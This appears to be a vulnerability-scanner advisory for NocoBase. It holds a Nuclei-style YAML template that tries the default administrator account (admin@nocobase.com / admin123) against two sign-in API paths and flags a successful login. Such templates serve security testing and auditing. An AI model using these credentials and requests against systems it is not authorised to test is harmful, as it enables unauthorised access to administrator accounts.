nocobase-default-login: NocoBase - Default Login

Date: 2025-08-01 | Affected software: NocoBase | PoC: public

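Vulnerability description

NocoBase default login was discovered: the instance accepts the default account admin@nocobase.com with the password admin123.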

PoC code [public]

id: nocobase-default-login

info:
  name: NocoBase - Default Login
  author: Fur1na, icarot
  severity: high
  description: |
    NocoBase default login was discovered.
  reference:
    - https://www.nocobase.com/
    - https://github.com/nocobase/nocobase
    - https://docs.nocobase.com/welcome/getting-started/installation/docker-compose
  metadata:
    verified: true
    max-request: 2
    zoomeye-query: app="NocoBase"
  tags: default-login,nocobase,vuln

variables:
  username: "admin@nocobase.com"
  password: "admin123"

http:
  - raw:
      - |
        POST {{path}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"account": "{{username}}", "password": "{{password}}"}

    payloads:
      path:
        - '/api/auth:signIn'
        - '/api/v1/auth/user/signin'

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"username":'
          - '"email":'
          - 'systemSettings'
        condition: and

      - type: word
        part: content_type
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100f8333ad6116c640f723006e64babe39e8f2d77f6d3b57e65b9c8084e7dc13b8b022100dcc0135ba542cbacbe03f9e17cb24c39a9e836d0a8b765a784b220511f4e7e07:922c64590222798bb761d5b6d8e72950
